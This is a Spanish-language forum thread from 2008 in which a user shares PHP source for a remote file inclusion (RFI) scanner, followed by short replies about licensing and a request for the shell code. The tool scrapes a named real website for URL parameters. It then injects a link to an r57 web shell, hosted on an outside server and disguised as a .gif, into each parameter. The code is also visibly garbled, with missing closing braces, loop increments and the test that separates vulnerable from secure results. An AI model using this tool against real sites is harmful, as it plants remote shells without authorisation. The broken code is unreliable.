Ver la versión completa : RFI Scanner [PHP]

04-10-2008, 13:47
Lo programe hace bastante tiempo, me habia olvidado de el hasta ayer que lo encontre y decidid publicar el codigo :P

Mas informacion: http://www.elefren.com/blog/RFI-Scanner-en-PHP/

Saludos, elefrEn

RFI Scanner 1.0
Author: elefrEn
Website: http://elefren.com/
email: [email protected]

Dedicated to Spanish Hackers Team - http://spanish-hackers.com/
Gr33tz: -> JosS | nhh-32 | Omega <-


$urlweb = "www.guia-ubuntu.org";# Out http://, ex: google.com
$urlshell = "http://usuarios.lycos.es/w0rms/r57.gif";# Url where you sent the shell script
$comunvars = "cual|admindir|sec|id|file|doc|module|modulo|name";# Comun vars vulns to RFI in cms´s, etc...
$filetoscan = "index.php";# The file that you want scan

function vars($url){
$xpl = parse_url($url);$xpl = $xpl[query];$xpl = explode("&",$xpl);
$var = 0;
while($var < count($xpl)){
$v4r = explode("=",$xpl[$var]);
$m0s .= '|'.$v4r[0];
$m0s = str_replace('amp;','',$m0s);
return $m0s;
function beerres($list, $barras = FALSE){
$s3p4 = '<br>';
if($barras) $s3p4 = '|';
$list = explode('|',$list);
$var = 0;
while($var < count($list)){
if($list[$var] != ''){
if(!@preg_match("/$list[$var]/i",$m0s) ){
$m0s .= $list[$var].$s3p4;
return $m0s;
function extrac($n00b, $file = FALSE){
$n0ob = 'http://'.$n00b;
$source = join("",file(&$n0ob));
$vars = preg_match_all('/<a href="'.$file.'(.*)">(.*)<\/a>/i',$source,$results);
$t0t = count($results[1]);
$var = 0;
while($var < $t0t){
$xtr = explode('"',$results[1][$var]);
$urllist .= $xtr[0].'|';
$varlist .= vars($xtr[0]);
$m0s .= $varlist;
return beerres($m0s,1);
function rfi($vars,$web,$file,$urlshell){
$list = explode('|',$vars);
$var = 0;
while($var < count($list)){
$url = $web.$file."?".$list[$var]."=".$urlshell."?";
$source = join("",file(&$url));
$m0s .= "<font color=red><b>RFI-></b></font> ";
$m0s .= "<font color=green><b>Secure-></b></font> ";
$m0s .= $url.'<br>';
return $m0s;

echo rfi(extrac($urlweb).$comunvars,'http://'.$urlweb.'/',$filetoscan,$urlshell);

04-10-2008, 14:19
"tool para hacer scanner masivamente a webs insertadas en un txt"

Gracias por compartir la herramienta, ¿entonces que licencia tiene el código? CC?

04-10-2008, 21:32
Pues si, mientras se respeten los creditos no hay problema, claramente podras añadirte a los creditos :D

11-05-2011, 18:41
Por casualidad cuál es el código de la shell?